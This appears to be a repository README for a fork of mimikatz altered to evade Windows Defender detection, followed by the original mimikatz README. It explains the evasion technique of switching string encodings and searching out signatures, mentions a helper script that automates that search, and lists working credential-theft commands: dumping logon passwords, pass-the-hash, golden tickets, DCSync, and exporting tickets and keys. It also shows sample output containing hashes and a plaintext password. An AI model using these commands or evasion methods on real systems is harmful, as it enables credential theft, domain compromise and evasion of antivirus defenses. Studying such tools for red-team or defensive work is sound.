This repository contains a tweaked version of mimikatz that passes
Windows Defender checks at time of push. It was done as a learning
experience in how to bypass Windows Defender and is probably of
limited use as most use-cases of mimikatz requires elevated system
access, and thus can easily pause Windows Defender if needed to run
it. In addition, I currently have no intention of updating this code
again.
Of note, most of the tweaked strings were changed by switching between
UTF8 and UTF16 (and updating printf format specifiers) as it
appears Windows Defender does not check both variants. Only in a very
small number of cases was it needed to perform anything more
intelligent, such as modifying strings at runtime where the change of
string encoding would have incurred significant refactoring.
Some final musings:
-
Given that its 2020, changing string encoding was surprisingly successful! Before starting this experiment, I assumed some form of real obfuscation would be needed.
-
While doing this, it appears that Windows Defender was using something analogous to YARA rules to perform the detection. So it was not flagging on just one string, but when a number of strings were present. This meant that is possible to inject known bad strings into the binary early on to identify other bad strings. This was useful as it meant when there are bad strings in the
IAT, it was possible just to search for other bad strings in the main body of the application to prevent the later bad strings flagging up the binary. -
In addition, I placed a simple
powershellscript mpcmdrun-splitter.ps1 into this repository with a few useful utility cmdlets that callMpCmdRun.exeon a file. Also, it contains a cmdlet that automates the binary search process that was performed manually in IppSec's AV Evasion YouTube video.
mimikatz is a tool I've made to learn C and make somes experiments with Windows security.
It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).
If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
- for
mimikatzandmimilib: Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for
mimikatz driver,mimilove(andddk2003platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800
mimikatz uses SVN for source control, but is now available with GIT too!
You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)
- GIT URL is : https://github.com/gentilkiwi/mimikatz.git
- SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
- ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip
- After opening the solution,
Build/Build Solution(you can change architecture) mimikatzis now built and ready to be used! (Win32/x64evenARM64if you're lucky)- you can have error
MSB3073about_build_.cmdandmimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), butmimikatzandmimilibare OK.
- you can have error
With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)
For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:
- http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
- http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
mimikatz needs coffee to be developed:
- PayPal: https://www.paypal.me/delpy/
- Benjamin DELPY
gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync and DCShadow functions in
lsadumpmodule were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )
This is a personal development, please respect its philosophy and don't use it for bad things!